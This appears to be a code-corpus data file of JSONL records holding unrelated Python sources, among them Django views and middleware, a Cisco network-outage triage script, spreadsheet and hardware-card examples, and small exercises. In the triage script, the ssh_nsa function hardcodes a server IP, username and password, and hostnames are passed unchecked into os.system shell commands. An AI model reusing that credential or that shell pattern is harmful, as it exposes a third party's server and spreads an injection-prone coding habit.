\"--debug\", \"--no-browser\"]\n proc = subprocess.Popen(args, stdin=subprocess.PIPE)\n\n try:\n proc.wait()\n except KeyboardInterrupt:\n proc.terminate()\n proc.communicate(b\"y\\n\")\n\n proc.wait()\n return True\n\n return doit.tools.PythonInteractiveAction(jupyterlab)\n\n\ndef patch_sphinx_sitemap(conf_py):\n text = conf_py.read_text(encoding=\"utf-8\")\n patches = []\n\n if \"html_baseurl\" not in text:\n patches += [\"html_baseurl = 'https://localhost:8080/docs/'\"]\n\n if \"sphinx_sitemap\" not in text:\n patches += [\"extensions = ['sphinx_sitemap']\"]\n\n if patches:\n patches += [\"## patches added by @jupyterlab/accessibility\", *patches]\n conf_py.write_text(\"\\n\\n\".join([text, \"\", *patches, \"\"]), encoding=\"utf-8\")\n","sub_path":"dodo.py","file_name":"dodo.py","file_ext":"py","file_size_in_byte":12629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"319700891","text":"from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('new/', views.new_recipe, name='new_recipe'),\n path('purchases_index/', views.purchases_list, name='purchases_list'),\n path('download_txt/',\n views.download, name='download'),\n path('//edit/',\n views.recipe_edit, name='recipe_edit'),\n path('//delete/',\n views.recipe_delete, name='recipe_delete'),\n path('subscriptions//',\n views.subscriptions, name='subscriptions'),\n path('favorites//', views.favorites, name='favorites'),\n path('/', views.profile, name='profile'),\n path('//', views.recipe_view, name='recipe'),\n]\n","sub_path":"recipes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"223807153","text":"import logging\n\nfrom django.utils.deprecation import MiddlewareMixin\nfrom django.utils.translation import get_language\nfrom .utils.analytics import get_client_id, report_view\n\nlogger = logging.getLogger(__name__)\n\n\nclass CompatibilityMetaMiddleware(MiddlewareMixin):\n def process_response(self, request, response):\n response['X-UA-Compatible'] = 'IE=edge;chrome=1'\n return response\n\n\nclass GoogleAnalytics(MiddlewareMixin):\n def process_request(self, request):\n client_id = get_client_id(request)\n path = request.path\n language = get_language()\n headers = request.META\n\n try:\n report_view(client_id, path=path, language=language, headers=headers)\n except Exception:\n logger.exception('Unable to update analytics')\n","sub_path":"{{cookiecutter.project_name}}/src/{{cookiecutter.project_module}}/core/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"652477910","text":"import argparse\nimport getpass\nimport json\nimport os\nimport subprocess\nimport time\nimport sys\n\nfrom colorama import init, Fore, Style\nfrom napalm import get_network_driver\nfrom netmiko import ConnectHandler\n\ndebug = True\n\ntelco = ['vf','telefonica', '-dc']\n\ndef timeit(method):\n def timed(*args, **kw):\n ts = time.time()\n result = method(*args, **kw)\n te = time.time()\n if 'log_time' in kw:\n name = kw.get('log_name', method.__name__.upper())\n kw['log_time'][name] = int((te - ts) * 1000)\n else:\n pprint('ran for %2.2f ms' % ((te - ts) * 1000), 'info')\n return result\n\n return timed\n\n\ndef display_time(seconds, granularity=5):\n result = []\n intervals = (\n ('weeks', 604800),\n ('days', 86400),\n ('hours', 3600),\n ('minutes', 60),\n ('seconds', 1),\n )\n for name, count in intervals:\n value = seconds // count\n if value:\n seconds -= value * count\n if value == 1:\n name = name.rstrip('s')\n result.append(\"{} {}\".format(value, name))\n return ', '.join(result[:granularity])\n\n\ndef coloured(content, colour='blue'):\n if colour == 'green':\n return '{}{}{}{}'.format(Fore.GREEN, Style.BRIGHT, content, Style.RESET_ALL)\n elif colour == 'red':\n return '{}{}{}{}'.format(Fore.RED, Style.BRIGHT, content, Style.RESET_ALL)\n else:\n return '{}{}{}{}'.format(Fore.CYAN, Style.BRIGHT, content, Style.RESET_ALL)\n\n\ndef pprint(content, level=\"info\", debug_header=\"\"):\n if type(content) is dict:\n content = json.dumps(content, indent=3, sort_keys=True)\n if level == \"info\":\n print('[{}{}info{}] {}'.format(Fore.CYAN, Style.BRIGHT, Style.RESET_ALL, content))\n elif level == \"error\":\n print('\\n[{}{}error{}] {}'.format(Fore.RED, Style.BRIGHT, 
Style.RESET_ALL, content))\n elif level == \"output\":\n print('[{}{}output{}] {}'.format(Fore.GREEN, Style.BRIGHT, Style.RESET_ALL, content))\n elif level == \"debug\":\n print(\n '\\n[{}{}debug{}] {}\\n{}\\n[{}{}debug{}]\\n'.format(\n Fore.YELLOW, Style.BRIGHT, Style.RESET_ALL, debug_header, content, Fore.YELLOW,\n Style.BRIGHT, Style.RESET_ALL))\n else:\n print(content)\n\n\ndef run_shell(command):\n return subprocess.call(command)\n\ndef ssh_nsa(command):\n output = \"\"\n try:\n print (command)\n net_connect = ConnectHandler(device_type='linux', ip='163.185.18.93', username='omneswan', password='MujHe3!a')\n output = net_connect.send_command(command)\n net_connect.disconnect()\n except Exception as e:\n pprint(str(e), \"error\")\n return output\ndef ssh(ip, creds, command):\n output = \"\"\n try:\n net_connect = ConnectHandler(device_type='cisco_ios', ip=ip, username=creds[0], password=creds[1])\n output = net_connect.send_command(command)\n net_connect.disconnect()\n except Exception as e:\n pprint(str(e), \"error\")\n return output\n\ndef last_reach1(host, name, ipaddr, credent):\n ######THIS METHOD IS FOR LOGS FROM THE ACTIVE ROUTER######\n\n output = ssh(name, credent, 'show ip arp | i {}'.format(ipaddr))\n pprint('\\nshow ip arp | i ' + ipaddr + '\\n\\n' + str(output), 'output')\n\n output = ssh(name, credent, 'clear arp')\n pprint('\\nclear arp\\n\\n' + str(output), 'output')\n\n output = ssh(name, credent, 'ping {}'.format(host))\n pprint('\\nping ' + host + '\\n\\n' + str(output), 'output')\n\n output = ssh(name, credent, 'show ip arp | i {}'.format(ipaddr))\n pprint('\\nshow ip arp | i ' + ipaddr + '\\n\\n' + str(output), 'output')\n\n output = ssh(name, credent, 'show clock')\n pprint('\\nshow clock\\n\\n' + str(output), 'output')\n\n\ndef last_reach(host, name, ipaddr,number, credent):\n ######THIS METHOD IS FOR LAST REACH OF LAN DOWN######\n i = 0\n f = 0\n k = 0\n j = 0\n stop = 0\n switch = 0\n output = ssh(name, credent, 'show cdp neighbors')\n pprint('\\nshow cdp neighbors\\n\\n' + str(output), 'output')\n array = output.splitlines()\n\n for x in array:\n if host in x:\n num = i\n j = 1\n p = array[num + 1].split()\n newstr = str(p[0] + p[1])\n else:\n j = 0\n i = i + 1\n\n if j==1:\n output = ssh(name, credent, 'show int {}'.format(newstr))\n pprint('\\nshow int '+newstr+'\\n\\n' + str(output), 'output')\n output = ssh(name, credent, 'show run int {}'.format(newstr))\n pprint('\\nshow run int ' + newstr + '\\n\\n' + str(output), 'output')\n output_test = ssh(name, credent, 'show version | i up')\n test = output_test.split()\n get_name = test[0]\n if '-cs' not in get_name:\n file = open(\"pings.txt\", mode='r')\n array = file.read().splitlines()\n while number >=0:\n if stop == 0:\n if '-cs' in array[number]:\n router_num = number\n stop = 1\n number = number - 1\n\n outp = array[router_num]\n file.close()\n\n array1 = outp.split()\n cs_name = array1[7]\n\n\n last_reach1(host,cs_name, ipaddr, credent)\n else:\n last_reach1(host, name, ipaddr, credent)\n\n\n\ndef check_ping_LAN(host, credent):\n ######THIS METHOD IS FOR SWITCH (LAN) DOWN######\n res_print = run_shell(\"ping {}\".format(host))\n res1_print = run_shell(\"tracert -w 600 {}\".format(host))\n print()\n pprint('Hold On... 
Gathering Information...\\n')\n response = os.system(\"ping {} >pings.txt\".format(host))\n response1 = os.system(\"tracert -h 20 {} >>pings.txt\".format(host))\n j = 0\n k = 0\n i = 0\n end = 0\n counting = 0\n file = open(\"pings.txt\", mode='r')\n array = file.read().splitlines()\n for x in array:\n\n if 'Destination host unreachable' in x or 'Request timed out' in x:\n j = 1\n if 'Ping statistics for' in x:\n ipadd = x\n if k == 0:\n if '* * * Request timed out.' in x:\n counting = counting + 1\n if counting == 3:\n num = i - 2\n num = num -1\n k = 1\n else:\n counting = 0\n i = i + 1\n\n if j == 1:\n output = ssh_nsa('ping -c 5 {}'.format(host))\n pprint('\\nPinging from NSA\\n\\n'+ str(output), 'output')\n output = ssh_nsa('traceroute -m 18 {}'.format(host))\n pprint('\\nTracing from NSA\\n\\n'+ str(output), 'output')\n if any(word in array[num] for word in telco):\n end = 1\n pprint('Check for WAN outage', 'debug')\n else:\n if '.slb.net' in array[num]:\n outp = array[num]\n else:\n end = 1\n file.close()\n if end == 0:\n array = outp.split()\n name1 = array[8]\n name = ''.join((ch if ch in '0123456789.' else '') for ch in name1)\n\n ipaddr = ipadd.split()[3]\n newipadd = ''.join((ch if ch in '0123456789.' else '') for ch in ipaddr)\n\n last_reach(host, name, newipadd, num, credent)\n\n\n pingstatus = \"Device is Unreachable!!!\"\n else:\n output = ssh_nsa('ping -c 5 {}'.format(host))\n pprint('\\n'+ str(output), 'output')\n output = ssh_nsa('traceroute -m 18 {}'.format(host))\n pprint('\\n'+ str(output), 'output')\n output = ssh(host, credent, 'show version | i up')\n pprint('\\nshow version | i up\\n\\n' + str(output), 'output')\n output = ssh(host, credent, 'show ip bgp summary')\n pprint('\\nshow ip bgp summary\\n\\n' + str(output), 'output')\n output = ssh(host, credent, 'show clock')\n pprint('\\nshow clock\\n\\n' + str(output), 'output')\n pingstatus = \"Device is Reachable!!!\"\n\n return pingstatus\n\n\n\ndef check_ping(host, credent):\n ######THIS METHOD IS FOR ROUTER (WAN) DOWN######\n res_print = run_shell(\"ping {}\".format(host))\n res1_print = run_shell(\"tracert -w 600 {}\".format(host))\n print()\n pprint('Hold On... 
Gathering Information...\\n')\n response = os.system(\"ping {} >pings.txt\".format(host))\n response1 = os.system(\"tracert -h 15 {} >>pings.txt\".format(host))\n file = open(\"pings.txt\", mode='r')\n array = file.read().splitlines()\n j = 0\n for x in array:\n\n if 'Destination host unreachable' in x or 'Request timed out' in x:\n j = 1\n\n file.close()\n if j == 0:\n output = ssh_nsa('ping -c 5 {}'.format(host))\n pprint('\\nPing from NSA\\n\\n'+ str(output), 'output')\n output = ssh_nsa('traceroute -m 18 {}'.format(host))\n pprint('\\nTrace from NSA\\n\\n'+ str(output), 'output')\n\n output = ssh(host, credent, 'show version | i up'.format(host))\n pprint('\\nshow version | i up\\n\\n' + str(output), 'output')\n output = ssh(host, credent, 'show ip bgp summary'.format(host))\n pprint('\\nshow ip bgp summary\\n\\n' + str(output), 'output')\n output = ssh(host, credent, 'show clock')\n pprint('\\nshow clock\\n\\n' + str(output), 'output')\n pingstatus = \"Device is Reachable!!!\"\n else:\n output = ssh_nsa('ping -c 5 {}'.format(host))\n pprint('\\n'+ str(output), 'output')\n output = ssh_nsa('traceroute -m 18 {}'.format(host))\n pprint('\\n'+ str(output), 'output')\n pingstatus = \"Device is Unreachable!!!\"\n\n return pingstatus\n@timeit\ndef main(args):\n if os.environ.get('scriptldap') is not None:\n pprint(\"using env set credentials {}\".format(os.environ.get('scriptldap')))\n username = os.environ.get('scriptldap')\n password = os.environ.get('scripttacacspass')\n else:\n username = input(\"Username: \")\n password = getpass.getpass(\"Password: \")\n for host in args.hostname:\n #driver = get_network_driver('ios')\n #pprint('connecting to {}..'.format(host))\n credent = [username, password]\n try:\n if debug:\n # name = 'om0030-core-sw1.mgmt.slb.net'\n # last_reach(host, name, '172.30.195.19', 20)\n pprint('Pinging and tracing {}... 
Please Wait...'.format(host))\n if 'cs.mgmt.slb.net' not in host:\n output = check_ping_LAN(host, credent)\n else:\n output = check_ping(host, credent)\n pprint(str(output), 'debug')\n\n\n\n except Exception as e:\n pprint(str(e), 'error')\n\nif __name__ == '__main__':\n try:\n init()\n parser = argparse.ArgumentParser(description=\"Script to be used by EMC Analyst handling 'DEVICE NOT RESPONDING' Tickets\")\n parser.add_argument(\"hostname\", nargs='+', help=\"Device hostname\")\n parser.add_argument(\"--debug\", help=\"Enable Debug, will show API call details\", action='store_true',\n default=False)\n args = parser.parse_args()\n debug = args.debug\n main(args)\n except KeyboardInterrupt:\n print(\"\\n\")\n pprint(\"user cancel (Ctrl+C) received, exiting..\", \"info\")\n except Exception as e:\n pprint(str(e), \"error\")\n print(\"\\n\\n\")\n","sub_path":"venv/DNR.py","file_name":"DNR.py","file_ext":"py","file_size_in_byte":11200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"359741010","text":"#\n# Python bindings for the Cisco VIRL 2 Network Simulation Platform\n#\n# This file is part of VIRL 2\n#\n# Copyright 2020 Cisco Systems Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport io\nimport logging\n\n\nclass TextFsmNotInstalled(Exception):\n pass\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass TextFsmTemplateHelper:\n def __init__(self):\n self._tokens = []\n self._lines = []\n\n def clear(self):\n self._tokens = []\n self._lines = []\n\n def add_token(self, name, pattern):\n # TODO: warn if not raw string\n entry = \"Value {} ({})\".format(name, pattern)\n self._tokens.append(entry)\n\n def add_numeric_token(self, name):\n # TODO: warn if not raw string\n entry = \"Value {} (\\\\d+)\".format(name)\n self._tokens.append(entry)\n\n def add_line(self, line):\n # TODO: warn if unescaped brackets in line\n self._lines.append(line)\n\n def render(self):\n result = \"\"\n for token in self._tokens:\n result += token + \"\\n\"\n\n result += \"\\n\"\n result += \"Start\\n\"\n for line in self._lines:\n result += fr\" ^{line} -> Record\"\n\n return result\n\n\ndef splice_interface_ip_into_config(config, remote, ip_address, netmask):\n search_string = \"description to {}\\n no ip address\".format(remote)\n replace_string = \"description to {}\\n ip address {} {}\".format(\n remote, ip_address, netmask\n )\n return config.replace(search_string, replace_string)\n\n\ndef parse_with_textfsm_template(template, cli_result):\n try:\n import textfsm\n except ImportError:\n logger.warning(\"TextFSM not installed\")\n raise TextFsmNotInstalled\n\n string_fh = io.StringIO(template)\n fsm = textfsm.TextFSM(string_fh)\n fsm_result = fsm.ParseText(cli_result)\n result = []\n for entry in fsm_result:\n data = {}\n for index, heading in enumerate(fsm.header):\n data[heading] = entry[index]\n result.append(data)\n\n return result\n\n\ndef parse_ping(result):\n import re\n\n match = re.search(r\"Success rate is (?P<rate>\\d+) percent\", 
result)\n success_rate = int(match.group(\"rate\"))\n return {\"success\": success_rate}\n\n\ndef parse_interfaces(get_offsets_for_keywords, parse_line, result):\n lines = result.splitlines()\n\n title = lines[0]\n body = lines[1:]\n offsets = get_offsets_for_keywords(title)\n keys = [\"Interface\", \"Status\", \"Protocol\"]\n\n result = {}\n\n for line in body:\n data = parse_line(line, keys, offsets)\n label = data[\"Interface\"]\n result[label] = {\"Status\": data[\"Status\"], \"Protocol\": data[\"Protocol\"]}\n\n return result\n\n\ndef parse_line(line, keys, offsets):\n result = {}\n for key in keys:\n start = offsets[key][\"start\"]\n end = offsets[key][\"end\"]\n value = line[start:end]\n # strip off whitespace as could be right padded if short entry relative to others in the column\n result[key] = value.rstrip()\n return result\n\n\ndef get_offsets_for_keywords(title):\n offsets = {}\n start_index_for_keyword = None\n keyword = None\n previous_keyword = None\n\n for index, element in enumerate(title):\n if element == \" \":\n if start_index_for_keyword is not None:\n offsets[keyword] = {}\n offsets[keyword][\"start\"] = start_index_for_keyword\n\n if previous_keyword:\n offsets[previous_keyword][\"end\"] = start_index_for_keyword - 1\n\n start_index_for_keyword = None\n previous_keyword = keyword\n keyword = \"\"\n else:\n if start_index_for_keyword is None:\n start_index_for_keyword = index\n keyword = element\n else:\n keyword += element\n # and store final item (as don't transition char->whitespace)\n if start_index_for_keyword:\n offsets[keyword] = {}\n offsets[previous_keyword][\"end\"] = start_index_for_keyword - 1\n offsets[keyword][\"start\"] = start_index_for_keyword\n offsets[keyword][\"end\"] = index\n return offsets\n","sub_path":"virl2_client/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"21685633","text":"\n\n\n # EXAMPLE PROGRAM FROM SPECTRUM #\n\n\n\n\n# **************************************************************************\n#\n# simple_rep_single.py (c) Spectrum GmbH , 11/2009\n#\n# **************************************************************************\n#\n# Example for all SpcMDrv based analog replay cards. 
\n# Shows a simple standard mode example using only the few necessary commands\n#\n# Information about the different products and their drivers can be found\n# online in the Knowledge Base:\n# https://www.spectrum-instrumentation.com/en/platform-driver-and-series-differences\n#\n# Feel free to use this source for own projects and modify it in any kind\n#\n# Documentation for the API as well as a detailed description of the hardware\n# can be found in the manual for each device which can be found on our website:\n# https://www.spectrum-instrumentation.com/en/downloads\n#\n# Further information can be found online in the Knowledge Base:\n# https://www.spectrum-instrumentation.com/en/knowledge-base-overview\n#\n# **************************************************************************\n#\n\n\nfrom pyspcm import *\nfrom spcm_tools import *\nimport sys\nfrom math import sin, pi\n\n#\n# **************************************************************************\n# main \n# **************************************************************************\n#\n\n# open card\n# uncomment the second line and replace the IP address to use remote\n# cards like in a generatorNETBOX\nhCard = spcm_hOpen (create_string_buffer (b'/dev/spcm0'))\n#hCard = spcm_hOpen (create_string_buffer (b'TCPIP::192.168.1.10::inst0::INSTR'))\nif hCard == None:\n sys.stdout.write(\"no card found...\\n\")\n exit ()\n\n\n# read type, function and sn and check for D/A card\nlCardType = int32 (0)\nspcm_dwGetParam_i32 (hCard, SPC_PCITYP, byref (lCardType))\nlSerialNumber = int32 (0)\nspcm_dwGetParam_i32 (hCard, SPC_PCISERIALNO, byref (lSerialNumber))\nlFncType = int32 (0)\nspcm_dwGetParam_i32 (hCard, SPC_FNCTYPE, byref (lFncType))\n\nsCardName = szTypeToName (lCardType.value)\nif lFncType.value == SPCM_TYPE_AO:\n sys.stdout.write(\"Found: {0} sn {1:05d}\\n\".format(sCardName,lSerialNumber.value))\nelse:\n sys.stdout.write(\"This is an example for D/A cards.\\nCard: {0} sn {1:05d} not supported by example\\n\".format(sCardName,lSerialNumber.value))\n exit ()\n\n\n# set samplerate to 1 MHz (M2i) or 50 MHz, no clock output\nif ((lCardType.value & TYP_SERIESMASK) == TYP_M4IEXPSERIES) or ((lCardType.value & TYP_SERIESMASK) == TYP_M4XEXPSERIES):\n spcm_dwSetParam_i64 (hCard, SPC_SAMPLERATE, int64(MEGA(50)))\nelse:\n spcm_dwSetParam_i64 (hCard, SPC_SAMPLERATE, MEGA(1))\nspcm_dwSetParam_i32 (hCard, SPC_CLOCKOUT, 0)\n\n# setup the mode\nqwChEnable = uint32 (2)\nllMemSamples = int64 (KILO_B(64))\nllLoops = int64 (0) # loop continuously\nspcm_dwSetParam_i32 (hCard, SPC_CARDMODE, SPC_REP_STD_CONTINUOUS)\nspcm_dwSetParam_i32 (hCard, SPC_CHENABLE, qwChEnable)\nspcm_dwSetParam_i64 (hCard, SPC_MEMSIZE, llMemSamples)\nspcm_dwSetParam_i64 (hCard, SPC_LOOPS, llLoops)\nspcm_dwSetParam_i64 (hCard, SPC_ENABLEOUT1, int64(1))\n\nlSetChannels = int32 (0)\nspcm_dwGetParam_i32 (hCard, SPC_CHCOUNT, byref (lSetChannels))\nlBytesPerSample = int32 (0)\nspcm_dwGetParam_i32 (hCard, SPC_MIINST_BYTESPERSAMPLE, byref (lBytesPerSample))\n\n# setup the trigger mode\n# (SW trigger, no output)\nspcm_dwSetParam_i32 (hCard, SPC_TRIG_ORMASK, SPC_TMASK_SOFTWARE)\nspcm_dwSetParam_i32 (hCard, SPC_TRIG_ANDMASK, 0)\nspcm_dwSetParam_i32 (hCard, SPC_TRIG_CH_ORMASK0, 0)\nspcm_dwSetParam_i32 (hCard, SPC_TRIG_CH_ORMASK1, 0)\nspcm_dwSetParam_i32 (hCard, SPC_TRIG_CH_ANDMASK0, 0)\nspcm_dwSetParam_i32 (hCard, SPC_TRIG_CH_ANDMASK1, 0)\nspcm_dwSetParam_i32 (hCard, SPC_TRIGGEROUT, 0)\n\nlChannel = int32 (1)\nspcm_dwSetParam_i32 (hCard, SPC_AMP0 + lChannel.value * (SPC_AMP1 - SPC_AMP0), int32 
(1000))\n\n# setup software buffer\nqwBufferSize = uint64 (llMemSamples.value * lBytesPerSample.value * lSetChannels.value)\npvBuffer = pvAllocMemPageAligned (qwBufferSize.value)\n\n# calculate the data\npnBuffer = cast (pvBuffer, ptr16)\nfor i in range (0, llMemSamples.value, 1):\n pnBuffer[i] = int(16384*sin(2*pi*(i / llMemSamples.value)))\n\n\n# we define the buffer for transfer and start the DMA transfer\nsys.stdout.write(\"Starting the DMA transfer and waiting until data is in board memory\\n\")\nspcm_dwDefTransfer_i64 (hCard, SPCM_BUF_DATA, SPCM_DIR_PCTOCARD, int32 (0), pvBuffer, uint64 (0), qwBufferSize)\nspcm_dwSetParam_i32 (hCard, SPC_M2CMD, M2CMD_DATA_STARTDMA | M2CMD_DATA_WAITDMA)\nsys.stdout.write(\"... data has been transferred to board memory\\n\")\n\n# We'll start and wait until the card has finished or until a timeout occurs\nspcm_dwSetParam_i32 (hCard, SPC_TIMEOUT, 10000)\nsys.stdout.write(\"\\nStarting the card and waiting for ready interrupt\\n(continuous and single restart will have timeout)\\n\")\ndwError = spcm_dwSetParam_i32 (hCard, SPC_M2CMD, M2CMD_CARD_START | M2CMD_CARD_ENABLETRIGGER | M2CMD_CARD_WAITREADY)\nif dwError == ERR_TIMEOUT:\n spcm_dwSetParam_i32 (hCard, SPC_M2CMD, M2CMD_CARD_STOP)\n\nspcm_vClose (hCard);\n\n","sub_path":"lib/simple_rep_single.py","file_name":"simple_rep_single.py","file_ext":"py","file_size_in_byte":5098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"102114408","text":"#encoding:utf-8\n\n__author__ = 'e-com2'\n\n\nfrom openpyxl import load_workbook\nfrom openpyxl.drawing import Image\nimport PIL.Image\nimport Image as PILImage\nfrom openpyxl.styles.numbers import NumberFormat\nfrom openpyxl.styles import Style,Font,Color,Alignment,Border,Side\nfrom openpyxl.styles.alignment import HORIZONTAL_RIGHT, HORIZONTAL_LEFT\nfrom datetime import datetime\nimport openpyxl.worksheet.worksheet\nimport openpyxl.cell.cell\nfrom pprint import pprint\n\nPILImage.open = PIL.Image.open\n\nside = Side(\n style= 'thin',\n color= Color()\n)\n\nborder = Border(\n left = side,\n top = side,\n right = side,\n bottom = side\n)\n\nnumberformat = NumberFormat(NumberFormat.FORMAT_NUMBER_COMMA_SEPARATED1)\n\n\nbordered = Style(\n border = border\n)\n\nsumstyle = Style(\n # font = Font(color = Color(rgb=RED)),\n number_format=numberformat\n)\n\nborderedsum = Style(\n border = border,\n number_format=numberformat\n)\n\natleast = Style(\n number_format=NumberFormat('Не менее '+NumberFormat.FORMAT_NUMBER_COMMA_SEPARATED1)\n)\n\nwraptext = Style(\n alignment = Alignment(wrap_text=True),\n font = Font(name='Arial')\n)\nalignRight = Style(\n alignment = Alignment(horizontal=HORIZONTAL_RIGHT)\n)\n\ndateformat = Style(\n font = Font(bold=True),\n alignment = Alignment(horizontal=HORIZONTAL_LEFT),\n number_format = NumberFormat(NumberFormat.FORMAT_DATE_XLSX22)\n)\n\nwb = load_workbook('/image/basketx.xlsx')\ndel wb.worksheets[0] # Заявка\n# del wb.worksheets[1] # Заказ\n# ws = openpyxl.worksheet.worksheet.Worksheet()\n# ws.rows\n# ws.remove\n\n# print len(wb.worksheets)\n\nws = wb.worksheets[0]\n\nimg3 = Image('/image/logo.jpg')\n# afterwards one can still add additional offsets from the cell\nimg3.anchor(ws['H1'], anchortype='oneCell')\n\n# a = openpyxl.cell.cell.Cell()\n\nws['B3'] = datetime.now()\nws['B3'].style = dateformat\nws['B4'] = 'Договор № 0901/1СОВ от 10.01.2013'\nws['B5'] = 'ООО \"Рога и копыта\" - ООО \"Элевел Мастер\"'\n\nidx = 8\ni=0\nwhile i<3:\n ws['A%s'%idx]= 'Belden Кабель F/UTP 4р. 
cat 5е PVC экранированный'\n ws['B%s'%idx]= 'Belden 1633E'\n ws['C%s'%idx]= 12\n ws['D%s'%idx]= 'гт.'\n if i:\n ws['E%s'%idx]= '530 / 0'\n\n ws['F%s'%idx]= 100\n\n ws['G%s'%idx]= 28.15\n\n ws['H%s'%idx]= '=G8*C8'\n\n ws['I%s'%idx]= '1 день'\n\n else:\n ws['E%s'%idx]= 'позиция не из каталога - требует уточнения у менеджера'\n\n ws['A%s'%idx].style = bordered\n ws['B%s'%idx].style = bordered\n ws['C%s'%idx].style = bordered\n ws['D%s'%idx].style = bordered\n\n ws['E%s'%idx].style = bordered\n ws['F%s'%idx].style = bordered\n ws['G%s'%idx].style = borderedsum\n ws['H%s'%idx].style = borderedsum\n ws['I%s'%idx].style = bordered\n\n\n idx+=1\n i+=1\n\n\n\nidx+=1\n\n\nws['G%s'%idx] = 'Итого скидки (руб)'\nws['G%s'%idx].style = alignRight\nws['H%s'%idx] = 2342123.443\nws['H%s'%idx].style = sumstyle\n\nidx+=1\nws['G%s'%idx] = 'Итого сумма заказа (руб)'\nws['G%s'%idx].style = alignRight\nws['H%s'%idx] = 123321.222\nws['H%s'%idx].style = sumstyle\n\n\nidx+=2\nws['G%s'%idx] = 'Вес корзины (кг):'\nws['G%s'%idx].style = alignRight\nws['H%s'%idx] = \"не менее %s\"%str(round(18.238,2)).replace('.',',')\n\nidx+=1\nws['G%s'%idx] = 'Объем крзины (м3):'\nws['G%s'%idx].style = alignRight\nws['H%s'%idx] = \"не менее %s\"%str(round(3333,2)).replace('.',',')\n\nidx+=5\nws['A%s'%idx] = 'ВНИМАНИЕ: Такие показатели, как количество товара на складах, цены и прогнозный срок доставки являются актуальными в момент выгрузки заявки и могут измениться с течением времени'\nws['A%s'%idx].style = wraptext\nws.merge_cells('A%s:I%s'%(idx,idx+1))\n\nidx+=3\nws['A%s'%idx] = 'Данный файл готов для загрузки в корзину на портале e.way'\n\n# img3.drawing.left = 5\nimg3.drawing.top = 10\nws.add_image(img3)\n\n\nwb.save(\"/image/baskety.xlsx\")","sub_path":"xls.py","file_name":"xls.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"562738830","text":"'''\nYour function should take in a single parameter (a string `word`)\nYour function should return a count of how many occurences of ***\"th\"*** occur within `word`. Case matters.\nYour function must utilize recursion. It cannot contain any loops.\n'''\ndef count_th(word):\n def keep_count(word, count):\n if len(word) <= 1:\n return count\n \n\n potential_t = word[0]\n potential_h = word[1]\n if potential_t + potential_h == \"th\":\n count += 1\n\n return keep_count(word[1:len(word)], count)\n\n return keep_count(word, 0)\n \n\n\nprint(\"should be 4,\", count_th(\"The fourth, thrid, and fifth\"))\n","sub_path":"recursive_count_th/count_th.py","file_name":"count_th.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"101362311","text":"import asyncio\nimport logging\nimport math\n\nlogger = logging.getLogger('implementations')\n\n\nasync def recursive_fibonacci(number: int) -> int:\n \"\"\"\n Recursive classic calculation\n\n :param number:\n :return:\n \"\"\"\n if number <= 1:\n logger.info(f\"Recursive result is {number}\")\n return number\n\n return await recursive_fibonacci(number - 1) + \\\n await recursive_fibonacci(number - 2)\n\n\nasync def binet_fibonacci(number: int) -> int:\n \"\"\"\n Binet solution for fibonacci. 
No recursion\n\n :param number:\n :return:\n \"\"\"\n fibonacci = (\n (\n (1 + math.sqrt(5)) ** number - (1 - math.sqrt(5)) ** number\n )\n /\n ((2 ** number) * math.sqrt(5))\n )\n return int(fibonacci)\n\n\ndef fibonacci_with_generator(number: int):\n \"\"\"\n Calculate fibonacci using a generator\n :param number: int\n :return: int\n \"\"\"\n logger.info(f\"Fibonacci task starting for: {number}\")\n i = 0\n sequence = []\n while i < number:\n i += 1\n if len(sequence) < 2:\n sequence.append(1)\n yield sequence[-1]\n continue\n\n new_number = sum(sequence)\n sequence.append(new_number)\n sequence.pop(0)\n yield new_number\n","sub_path":"worker/application/implementations/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"304864372","text":"import datetime\nimport json\n\nfrom django.test import TestCase\n\nfrom corehq.apps.es.sms import SMSES\nfrom corehq.apps.es.tests.utils import es_test\nfrom corehq.apps.sms.models import INCOMING, OUTGOING\nfrom dimagi.utils.parsing import json_format_datetime\nfrom pillowtop.es_utils import initialize_index_and_mapping\n\nfrom corehq.apps.domain.calculations import all_domain_stats, calced_props, sms, get_sms_count\nfrom corehq.apps.domain.models import Domain\nfrom corehq.elastic import get_es_new, refresh_elasticsearch_index\nfrom corehq.pillows.mappings.case_mapping import CASE_INDEX_INFO\nfrom corehq.pillows.mappings.sms_mapping import SMS_INDEX_INFO\nfrom corehq.pillows.mappings.xform_mapping import XFORM_INDEX_INFO\nfrom corehq.pillows.mappings.user_mapping import USER_INDEX_INFO\nfrom corehq.util.elastic import ensure_index_deleted\nfrom corehq.elastic import send_to_elasticsearch\n\n\n@es_test\nclass BaseCalculatedPropertiesTest(TestCase):\n @classmethod\n def setUpClass(cls):\n super(BaseCalculatedPropertiesTest, cls).setUpClass()\n cls.es = [{\n 'info': index_info,\n 'instance': get_es_new(),\n } for index_info in [CASE_INDEX_INFO, SMS_INDEX_INFO, 